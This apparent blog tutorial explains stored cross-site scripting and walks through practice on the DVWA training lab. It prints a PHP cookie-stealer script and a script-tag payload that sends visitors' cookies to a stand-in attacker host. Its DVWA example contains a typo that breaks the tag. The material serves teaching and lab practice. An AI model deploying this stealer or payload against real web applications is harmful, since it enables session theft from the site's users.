Performing Stored XSS Attacks

In last post to cross site scripting we discussed about how to perform a reflected XSS attack. In this following post we will discus how to perform a stored XSS attack. A stored XSS attack is said to done when attacker uses XSS vulnerability of web application to store his/her submitted script in web application’s database and then it is displayed to other users without being filtered or sanitized.

Stored XSS vulnerabilities are common in web application which supports interaction between several users for example, guest books, comment replies, question forms, response forms, review sections etc. If attacker manages to embed a Java script in such application then it can help him/her attack every user who will interact with his/her submitted data. Practically both attacks are performed in same way but on different type of web applications.

Let’s consider a real example suppose an attacker wants to steal user’s cookies from some abcxyz forum. So first of all he/she will prepare a cookie stealer, following PHP script is simple example of cookie stealer you can also create a cookie stealer with Java Script.
<?php
if(isset($_GET[‘cookie’])){
$cookie = $_GET[‘cookie’];
$fh = fopen(“cookies.txt”, “a”);
fwrite($fh, $cookie);
}
?>
Now suppose he has hosted this script at http://www.attacker.com/stealer.php, where attaker.com is hacker’s website. Now while replying in a web application he/she will enter his/her name and also embed a Java Script which will call script every time when someone visits the thread or reply created by attacker. The java script might appear as follows,
<script>
document.write(‘<img style=”display: none;” src=”www.attacker.com/stealer.php?cookie=’+document.cookie+'”/>’);
</script>
To practice stored XSS attack on DVWA first set security level to low, then select “stored XSS attack”. Now in place of name type HACKER and in message section type following lines,
Visit <acript>alert(‘Hi from HACKER’)</script> <a href=“https://xtraweb.wordpress.com”>XTRA WEB</a>
After pressing submit button your message will be stored in DVWA, now post any other message you will find script embedded in your message with name HACKER will execute every time whenever a new message is posted. Now refer cheat sheet and try higher security levels. Those who can understand coding should also have their look on code snippets.
If something was difficult to understand then please feel free to ask. Thanks for reading, have a nice time and keep visiting.
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s